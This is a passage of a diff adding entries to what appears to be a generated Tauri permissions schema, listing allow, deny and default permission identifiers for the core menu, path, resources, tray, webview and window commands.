"markdownDescription": "Denies the new command without any pre-configured scope." + }, + { + "description": "Denies the popup command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-popup", + "markdownDescription": "Denies the popup command without any pre-configured scope." + }, + { + "description": "Denies the prepend command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-prepend", + "markdownDescription": "Denies the prepend command without any pre-configured scope." + }, + { + "description": "Denies the remove command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-remove", + "markdownDescription": "Denies the remove command without any pre-configured scope." + }, + { + "description": "Denies the remove_at command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-remove-at", + "markdownDescription": "Denies the remove_at command without any pre-configured scope." + }, + { + "description": "Denies the set_accelerator command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-accelerator", + "markdownDescription": "Denies the set_accelerator command without any pre-configured scope." + }, + { + "description": "Denies the set_as_app_menu command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-as-app-menu", + "markdownDescription": "Denies the set_as_app_menu command without any pre-configured scope." + }, + { + "description": "Denies the set_as_help_menu_for_nsapp command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-as-help-menu-for-nsapp", + "markdownDescription": "Denies the set_as_help_menu_for_nsapp command without any pre-configured scope." + }, + { + "description": "Denies the set_as_window_menu command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-as-window-menu", + "markdownDescription": "Denies the set_as_window_menu command without any pre-configured scope." + }, + { + "description": "Denies the set_as_windows_menu_for_nsapp command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-as-windows-menu-for-nsapp", + "markdownDescription": "Denies the set_as_windows_menu_for_nsapp command without any pre-configured scope." + }, + { + "description": "Denies the set_checked command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-checked", + "markdownDescription": "Denies the set_checked command without any pre-configured scope." + }, + { + "description": "Denies the set_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-enabled", + "markdownDescription": "Denies the set_enabled command without any pre-configured scope." + }, + { + "description": "Denies the set_icon command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-icon", + "markdownDescription": "Denies the set_icon command without any pre-configured scope." + }, + { + "description": "Denies the set_text command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-set-text", + "markdownDescription": "Denies the set_text command without any pre-configured scope." + }, + { + "description": "Denies the text command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-text", + "markdownDescription": "Denies the text command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-resolve-directory`\n- `allow-resolve`\n- `allow-normalize`\n- `allow-join`\n- `allow-dirname`\n- `allow-extname`\n- `allow-basename`\n- `allow-is-absolute`", + "type": "string", + "const": "core:path:default", + "markdownDescription": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-resolve-directory`\n- `allow-resolve`\n- `allow-normalize`\n- `allow-join`\n- `allow-dirname`\n- `allow-extname`\n- `allow-basename`\n- `allow-is-absolute`" + }, + { + "description": "Enables the basename command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-basename", + "markdownDescription": "Enables the basename command without any pre-configured scope." + }, + { + "description": "Enables the dirname command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-dirname", + "markdownDescription": "Enables the dirname command without any pre-configured scope." + }, + { + "description": "Enables the extname command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-extname", + "markdownDescription": "Enables the extname command without any pre-configured scope." + }, + { + "description": "Enables the is_absolute command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-is-absolute", + "markdownDescription": "Enables the is_absolute command without any pre-configured scope." + }, + { + "description": "Enables the join command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-join", + "markdownDescription": "Enables the join command without any pre-configured scope." + }, + { + "description": "Enables the normalize command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-normalize", + "markdownDescription": "Enables the normalize command without any pre-configured scope." + }, + { + "description": "Enables the resolve command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-resolve", + "markdownDescription": "Enables the resolve command without any pre-configured scope." + }, + { + "description": "Enables the resolve_directory command without any pre-configured scope.", + "type": "string", + "const": "core:path:allow-resolve-directory", + "markdownDescription": "Enables the resolve_directory command without any pre-configured scope." + }, + { + "description": "Denies the basename command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-basename", + "markdownDescription": "Denies the basename command without any pre-configured scope." + }, + { + "description": "Denies the dirname command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-dirname", + "markdownDescription": "Denies the dirname command without any pre-configured scope." + }, + { + "description": "Denies the extname command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-extname", + "markdownDescription": "Denies the extname command without any pre-configured scope." + }, + { + "description": "Denies the is_absolute command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-is-absolute", + "markdownDescription": "Denies the is_absolute command without any pre-configured scope." + }, + { + "description": "Denies the join command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-join", + "markdownDescription": "Denies the join command without any pre-configured scope." + }, + { + "description": "Denies the normalize command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-normalize", + "markdownDescription": "Denies the normalize command without any pre-configured scope." + }, + { + "description": "Denies the resolve command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-resolve", + "markdownDescription": "Denies the resolve command without any pre-configured scope." + }, + { + "description": "Denies the resolve_directory command without any pre-configured scope.", + "type": "string", + "const": "core:path:deny-resolve-directory", + "markdownDescription": "Denies the resolve_directory command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-close`", + "type": "string", + "const": "core:resources:default", + "markdownDescription": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-close`" + }, + { + "description": "Enables the close command without any pre-configured scope.", + "type": "string", + "const": "core:resources:allow-close", + "markdownDescription": "Enables the close command without any pre-configured scope." + }, + { + "description": "Denies the close command without any pre-configured scope.", + "type": "string", + "const": "core:resources:deny-close", + "markdownDescription": "Denies the close command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-new`\n- `allow-get-by-id`\n- `allow-remove-by-id`\n- `allow-set-icon`\n- `allow-set-menu`\n- `allow-set-tooltip`\n- `allow-set-title`\n- `allow-set-visible`\n- `allow-set-temp-dir-path`\n- `allow-set-icon-as-template`\n- `allow-set-icon-with-as-template`\n- `allow-set-show-menu-on-left-click`", + "type": "string", + "const": "core:tray:default", + "markdownDescription": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-new`\n- `allow-get-by-id`\n- `allow-remove-by-id`\n- `allow-set-icon`\n- `allow-set-menu`\n- `allow-set-tooltip`\n- `allow-set-title`\n- `allow-set-visible`\n- `allow-set-temp-dir-path`\n- `allow-set-icon-as-template`\n- `allow-set-icon-with-as-template`\n- `allow-set-show-menu-on-left-click`" + }, + { + "description": "Enables the get_by_id command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-get-by-id", + "markdownDescription": "Enables the get_by_id command without any pre-configured scope." + }, + { + "description": "Enables the new command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-new", + "markdownDescription": "Enables the new command without any pre-configured scope." + }, + { + "description": "Enables the remove_by_id command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-remove-by-id", + "markdownDescription": "Enables the remove_by_id command without any pre-configured scope." + }, + { + "description": "Enables the set_icon command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-icon", + "markdownDescription": "Enables the set_icon command without any pre-configured scope." + }, + { + "description": "Enables the set_icon_as_template command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-icon-as-template", + "markdownDescription": "Enables the set_icon_as_template command without any pre-configured scope." + }, + { + "description": "Enables the set_icon_with_as_template command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-icon-with-as-template", + "markdownDescription": "Enables the set_icon_with_as_template command without any pre-configured scope." + }, + { + "description": "Enables the set_menu command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-menu", + "markdownDescription": "Enables the set_menu command without any pre-configured scope." + }, + { + "description": "Enables the set_show_menu_on_left_click command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-show-menu-on-left-click", + "markdownDescription": "Enables the set_show_menu_on_left_click command without any pre-configured scope." + }, + { + "description": "Enables the set_temp_dir_path command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-temp-dir-path", + "markdownDescription": "Enables the set_temp_dir_path command without any pre-configured scope." + }, + { + "description": "Enables the set_title command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-title", + "markdownDescription": "Enables the set_title command without any pre-configured scope." + }, + { + "description": "Enables the set_tooltip command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-tooltip", + "markdownDescription": "Enables the set_tooltip command without any pre-configured scope." + }, + { + "description": "Enables the set_visible command without any pre-configured scope.", + "type": "string", + "const": "core:tray:allow-set-visible", + "markdownDescription": "Enables the set_visible command without any pre-configured scope." + }, + { + "description": "Denies the get_by_id command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-get-by-id", + "markdownDescription": "Denies the get_by_id command without any pre-configured scope." + }, + { + "description": "Denies the new command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-new", + "markdownDescription": "Denies the new command without any pre-configured scope." + }, + { + "description": "Denies the remove_by_id command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-remove-by-id", + "markdownDescription": "Denies the remove_by_id command without any pre-configured scope." + }, + { + "description": "Denies the set_icon command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-icon", + "markdownDescription": "Denies the set_icon command without any pre-configured scope." + }, + { + "description": "Denies the set_icon_as_template command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-icon-as-template", + "markdownDescription": "Denies the set_icon_as_template command without any pre-configured scope." + }, + { + "description": "Denies the set_icon_with_as_template command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-icon-with-as-template", + "markdownDescription": "Denies the set_icon_with_as_template command without any pre-configured scope." + }, + { + "description": "Denies the set_menu command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-menu", + "markdownDescription": "Denies the set_menu command without any pre-configured scope." + }, + { + "description": "Denies the set_show_menu_on_left_click command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-show-menu-on-left-click", + "markdownDescription": "Denies the set_show_menu_on_left_click command without any pre-configured scope." + }, + { + "description": "Denies the set_temp_dir_path command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-temp-dir-path", + "markdownDescription": "Denies the set_temp_dir_path command without any pre-configured scope." + }, + { + "description": "Denies the set_title command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-title", + "markdownDescription": "Denies the set_title command without any pre-configured scope." + }, + { + "description": "Denies the set_tooltip command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-tooltip", + "markdownDescription": "Denies the set_tooltip command without any pre-configured scope." + }, + { + "description": "Denies the set_visible command without any pre-configured scope.", + "type": "string", + "const": "core:tray:deny-set-visible", + "markdownDescription": "Denies the set_visible command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin.\n#### This default permission set includes:\n\n- `allow-get-all-webviews`\n- `allow-webview-position`\n- `allow-webview-size`\n- `allow-internal-toggle-devtools`", + "type": "string", + "const": "core:webview:default", + "markdownDescription": "Default permissions for the plugin.\n#### This default permission set includes:\n\n- `allow-get-all-webviews`\n- `allow-webview-position`\n- `allow-webview-size`\n- `allow-internal-toggle-devtools`" + }, + { + "description": "Enables the clear_all_browsing_data command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-clear-all-browsing-data", + "markdownDescription": "Enables the clear_all_browsing_data command without any pre-configured scope." + }, + { + "description": "Enables the create_webview command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-create-webview", + "markdownDescription": "Enables the create_webview command without any pre-configured scope." + }, + { + "description": "Enables the create_webview_window command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-create-webview-window", + "markdownDescription": "Enables the create_webview_window command without any pre-configured scope." + }, + { + "description": "Enables the get_all_webviews command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-get-all-webviews", + "markdownDescription": "Enables the get_all_webviews command without any pre-configured scope." + }, + { + "description": "Enables the internal_toggle_devtools command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-internal-toggle-devtools", + "markdownDescription": "Enables the internal_toggle_devtools command without any pre-configured scope." + }, + { + "description": "Enables the print command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-print", + "markdownDescription": "Enables the print command without any pre-configured scope." + }, + { + "description": "Enables the reparent command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-reparent", + "markdownDescription": "Enables the reparent command without any pre-configured scope." + }, + { + "description": "Enables the set_webview_auto_resize command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-set-webview-auto-resize", + "markdownDescription": "Enables the set_webview_auto_resize command without any pre-configured scope." + }, + { + "description": "Enables the set_webview_background_color command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-set-webview-background-color", + "markdownDescription": "Enables the set_webview_background_color command without any pre-configured scope." + }, + { + "description": "Enables the set_webview_focus command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-set-webview-focus", + "markdownDescription": "Enables the set_webview_focus command without any pre-configured scope." + }, + { + "description": "Enables the set_webview_position command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-set-webview-position", + "markdownDescription": "Enables the set_webview_position command without any pre-configured scope." + }, + { + "description": "Enables the set_webview_size command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-set-webview-size", + "markdownDescription": "Enables the set_webview_size command without any pre-configured scope." + }, + { + "description": "Enables the set_webview_zoom command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-set-webview-zoom", + "markdownDescription": "Enables the set_webview_zoom command without any pre-configured scope." + }, + { + "description": "Enables the webview_close command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-webview-close", + "markdownDescription": "Enables the webview_close command without any pre-configured scope." + }, + { + "description": "Enables the webview_hide command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-webview-hide", + "markdownDescription": "Enables the webview_hide command without any pre-configured scope." + }, + { + "description": "Enables the webview_position command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-webview-position", + "markdownDescription": "Enables the webview_position command without any pre-configured scope." + }, + { + "description": "Enables the webview_show command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-webview-show", + "markdownDescription": "Enables the webview_show command without any pre-configured scope." + }, + { + "description": "Enables the webview_size command without any pre-configured scope.", + "type": "string", + "const": "core:webview:allow-webview-size", + "markdownDescription": "Enables the webview_size command without any pre-configured scope." + }, + { + "description": "Denies the clear_all_browsing_data command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-clear-all-browsing-data", + "markdownDescription": "Denies the clear_all_browsing_data command without any pre-configured scope." + }, + { + "description": "Denies the create_webview command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-create-webview", + "markdownDescription": "Denies the create_webview command without any pre-configured scope." + }, + { + "description": "Denies the create_webview_window command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-create-webview-window", + "markdownDescription": "Denies the create_webview_window command without any pre-configured scope." + }, + { + "description": "Denies the get_all_webviews command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-get-all-webviews", + "markdownDescription": "Denies the get_all_webviews command without any pre-configured scope." + }, + { + "description": "Denies the internal_toggle_devtools command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-internal-toggle-devtools", + "markdownDescription": "Denies the internal_toggle_devtools command without any pre-configured scope." + }, + { + "description": "Denies the print command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-print", + "markdownDescription": "Denies the print command without any pre-configured scope." + }, + { + "description": "Denies the reparent command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-reparent", + "markdownDescription": "Denies the reparent command without any pre-configured scope." + }, + { + "description": "Denies the set_webview_auto_resize command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-set-webview-auto-resize", + "markdownDescription": "Denies the set_webview_auto_resize command without any pre-configured scope." + }, + { + "description": "Denies the set_webview_background_color command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-set-webview-background-color", + "markdownDescription": "Denies the set_webview_background_color command without any pre-configured scope." + }, + { + "description": "Denies the set_webview_focus command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-set-webview-focus", + "markdownDescription": "Denies the set_webview_focus command without any pre-configured scope." + }, + { + "description": "Denies the set_webview_position command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-set-webview-position", + "markdownDescription": "Denies the set_webview_position command without any pre-configured scope." + }, + { + "description": "Denies the set_webview_size command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-set-webview-size", + "markdownDescription": "Denies the set_webview_size command without any pre-configured scope." + }, + { + "description": "Denies the set_webview_zoom command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-set-webview-zoom", + "markdownDescription": "Denies the set_webview_zoom command without any pre-configured scope." + }, + { + "description": "Denies the webview_close command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-webview-close", + "markdownDescription": "Denies the webview_close command without any pre-configured scope." + }, + { + "description": "Denies the webview_hide command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-webview-hide", + "markdownDescription": "Denies the webview_hide command without any pre-configured scope." + }, + { + "description": "Denies the webview_position command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-webview-position", + "markdownDescription": "Denies the webview_position command without any pre-configured scope." + }, + { + "description": "Denies the webview_show command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-webview-show", + "markdownDescription": "Denies the webview_show command without any pre-configured scope." + }, + { + "description": "Denies the webview_size command without any pre-configured scope.", + "type": "string", + "const": "core:webview:deny-webview-size", + "markdownDescription": "Denies the webview_size command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin.\n#### This default permission set includes:\n\n- `allow-get-all-windows`\n- `allow-scale-factor`\n- `allow-inner-position`\n- `allow-outer-position`\n- `allow-inner-size`\n- `allow-outer-size`\n- `allow-is-fullscreen`\n- `allow-is-minimized`\n- `allow-is-maximized`\n- `allow-is-focused`\n- `allow-is-decorated`\n- `allow-is-resizable`\n- `allow-is-maximizable`\n- `allow-is-minimizable`\n- `allow-is-closable`\n- `allow-is-visible`\n- `allow-is-enabled`\n- `allow-title`\n- `allow-current-monitor`\n- `allow-primary-monitor`\n- `allow-monitor-from-point`\n- `allow-available-monitors`\n- `allow-cursor-position`\n- `allow-theme`\n- `allow-is-always-on-top`\n- `allow-activity-name`\n- `allow-scene-identifier`\n- `allow-internal-toggle-maximize`", + "type": "string", + "const": "core:window:default", + "markdownDescription": "Default permissions for the plugin.\n#### This default permission set includes:\n\n- `allow-get-all-windows`\n- `allow-scale-factor`\n- `allow-inner-position`\n- `allow-outer-position`\n- `allow-inner-size`\n- `allow-outer-size`\n- `allow-is-fullscreen`\n- `allow-is-minimized`\n- `allow-is-maximized`\n- `allow-is-focused`\n- `allow-is-decorated`\n- `allow-is-resizable`\n- `allow-is-maximizable`\n- `allow-is-minimizable`\n- `allow-is-closable`\n- `allow-is-visible`\n- `allow-is-enabled`\n- `allow-title`\n- `allow-current-monitor`\n- `allow-primary-monitor`\n- `allow-monitor-from-point`\n- `allow-available-monitors`\n- `allow-cursor-position`\n- `allow-theme`\n- `allow-is-always-on-top`\n- `allow-activity-name`\n- `allow-scene-identifier`\n- `allow-internal-toggle-maximize`" + }, + { + "description": "Enables the activity_name command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-activity-name", + "markdownDescription": "Enables the activity_name command without any pre-configured scope." + }, + { + "description": "Enables the available_monitors command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-available-monitors", + "markdownDescription": "Enables the available_monitors command without any pre-configured scope." + }, + { + "description": "Enables the center command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-center", + "markdownDescription": "Enables the center command without any pre-configured scope." + }, + { + "description": "Enables the close command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-close", + "markdownDescription": "Enables the close command without any pre-configured scope." + }, + { + "description": "Enables the create command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-create", + "markdownDescription": "Enables the create command without any pre-configured scope." + }, + { + "description": "Enables the current_monitor command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-current-monitor", + "markdownDescription": "Enables the current_monitor command without any pre-configured scope." + }, + { + "description": "Enables the cursor_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-cursor-position", + "markdownDescription": "Enables the cursor_position command without any pre-configured scope." + }, + { + "description": "Enables the destroy command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-destroy", + "markdownDescription": "Enables the destroy command without any pre-configured scope." + }, + { + "description": "Enables the get_all_windows command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-get-all-windows", + "markdownDescription": "Enables the get_all_windows command without any pre-configured scope." + }, + { + "description": "Enables the hide command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-hide", + "markdownDescription": "Enables the hide command without any pre-configured scope." + }, + { + "description": "Enables the inner_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-inner-position", + "markdownDescription": "Enables the inner_position command without any pre-configured scope." + }, + { + "description": "Enables the inner_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-inner-size", + "markdownDescription": "Enables the inner_size command without any pre-configured scope." + }, + { + "description": "Enables the internal_toggle_maximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-internal-toggle-maximize", + "markdownDescription": "Enables the internal_toggle_maximize command without any pre-configured scope." + }, + { + "description": "Enables the is_always_on_top command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-always-on-top", + "markdownDescription": "Enables the is_always_on_top command without any pre-configured scope." + }, + { + "description": "Enables the is_closable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-closable", + "markdownDescription": "Enables the is_closable command without any pre-configured scope." + }, + { + "description": "Enables the is_decorated command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-decorated", + "markdownDescription": "Enables the is_decorated command without any pre-configured scope." + }, + { + "description": "Enables the is_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-enabled", + "markdownDescription": "Enables the is_enabled command without any pre-configured scope." + }, + { + "description": "Enables the is_focused command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-focused", + "markdownDescription": "Enables the is_focused command without any pre-configured scope." + }, + { + "description": "Enables the is_fullscreen command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-fullscreen", + "markdownDescription": "Enables the is_fullscreen command without any pre-configured scope." + }, + { + "description": "Enables the is_maximizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-maximizable", + "markdownDescription": "Enables the is_maximizable command without any pre-configured scope." + }, + { + "description": "Enables the is_maximized command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-maximized", + "markdownDescription": "Enables the is_maximized command without any pre-configured scope." + }, + { + "description": "Enables the is_minimizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-minimizable", + "markdownDescription": "Enables the is_minimizable command without any pre-configured scope." + }, + { + "description": "Enables the is_minimized command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-minimized", + "markdownDescription": "Enables the is_minimized command without any pre-configured scope." + }, + { + "description": "Enables the is_resizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-resizable", + "markdownDescription": "Enables the is_resizable command without any pre-configured scope." + }, + { + "description": "Enables the is_visible command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-visible", + "markdownDescription": "Enables the is_visible command without any pre-configured scope." + }, + { + "description": "Enables the maximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-maximize", + "markdownDescription": "Enables the maximize command without any pre-configured scope." + }, + { + "description": "Enables the minimize command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-minimize", + "markdownDescription": "Enables the minimize command without any pre-configured scope." + }, + { + "description": "Enables the monitor_from_point command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-monitor-from-point", + "markdownDescription": "Enables the monitor_from_point command without any pre-configured scope." + }, + { + "description": "Enables the outer_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-outer-position", + "markdownDescription": "Enables the outer_position command without any pre-configured scope." + }, + { + "description": "Enables the outer_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-outer-size", + "markdownDescription": "Enables the outer_size command without any pre-configured scope." + }, + { + "description": "Enables the primary_monitor command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-primary-monitor", + "markdownDescription": "Enables the primary_monitor command without any pre-configured scope." + }, + { + "description": "Enables the request_user_attention command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-request-user-attention", + "markdownDescription": "Enables the request_user_attention command without any pre-configured scope." + }, + { + "description": "Enables the scale_factor command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-scale-factor", + "markdownDescription": "Enables the scale_factor command without any pre-configured scope." + }, + { + "description": "Enables the scene_identifier command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-scene-identifier", + "markdownDescription": "Enables the scene_identifier command without any pre-configured scope." + }, + { + "description": "Enables the set_always_on_bottom command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-always-on-bottom", + "markdownDescription": "Enables the set_always_on_bottom command without any pre-configured scope." + }, + { + "description": "Enables the set_always_on_top command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-always-on-top", + "markdownDescription": "Enables the set_always_on_top command without any pre-configured scope." + }, + { + "description": "Enables the set_background_color command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-background-color", + "markdownDescription": "Enables the set_background_color command without any pre-configured scope." + }, + { + "description": "Enables the set_badge_count command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-badge-count", + "markdownDescription": "Enables the set_badge_count command without any pre-configured scope." + }, + { + "description": "Enables the set_badge_label command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-badge-label", + "markdownDescription": "Enables the set_badge_label command without any pre-configured scope." + }, + { + "description": "Enables the set_closable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-closable", + "markdownDescription": "Enables the set_closable command without any pre-configured scope." + }, + { + "description": "Enables the set_content_protected command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-content-protected", + "markdownDescription": "Enables the set_content_protected command without any pre-configured scope." + }, + { + "description": "Enables the set_cursor_grab command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-cursor-grab", + "markdownDescription": "Enables the set_cursor_grab command without any pre-configured scope." + }, + { + "description": "Enables the set_cursor_icon command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-cursor-icon", + "markdownDescription": "Enables the set_cursor_icon command without any pre-configured scope." + }, + { + "description": "Enables the set_cursor_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-cursor-position", + "markdownDescription": "Enables the set_cursor_position command without any pre-configured scope." + }, + { + "description": "Enables the set_cursor_visible command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-cursor-visible", + "markdownDescription": "Enables the set_cursor_visible command without any pre-configured scope." + }, + { + "description": "Enables the set_decorations command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-decorations", + "markdownDescription": "Enables the set_decorations command without any pre-configured scope." + }, + { + "description": "Enables the set_effects command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-effects", + "markdownDescription": "Enables the set_effects command without any pre-configured scope." + }, + { + "description": "Enables the set_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-enabled", + "markdownDescription": "Enables the set_enabled command without any pre-configured scope." + }, + { + "description": "Enables the set_focus command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-focus", + "markdownDescription": "Enables the set_focus command without any pre-configured scope." + }, + { + "description": "Enables the set_focusable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-focusable", + "markdownDescription": "Enables the set_focusable command without any pre-configured scope." + }, + { + "description": "Enables the set_fullscreen command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-fullscreen", + "markdownDescription": "Enables the set_fullscreen command without any pre-configured scope." + }, + { + "description": "Enables the set_icon command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-icon", + "markdownDescription": "Enables the set_icon command without any pre-configured scope." + }, + { + "description": "Enables the set_ignore_cursor_events command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-ignore-cursor-events", + "markdownDescription": "Enables the set_ignore_cursor_events command without any pre-configured scope." + }, + { + "description": "Enables the set_max_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-max-size", + "markdownDescription": "Enables the set_max_size command without any pre-configured scope." + }, + { + "description": "Enables the set_maximizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-maximizable", + "markdownDescription": "Enables the set_maximizable command without any pre-configured scope." + }, + { + "description": "Enables the set_min_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-min-size", + "markdownDescription": "Enables the set_min_size command without any pre-configured scope." + }, + { + "description": "Enables the set_minimizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-minimizable", + "markdownDescription": "Enables the set_minimizable command without any pre-configured scope." + }, + { + "description": "Enables the set_overlay_icon command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-overlay-icon", + "markdownDescription": "Enables the 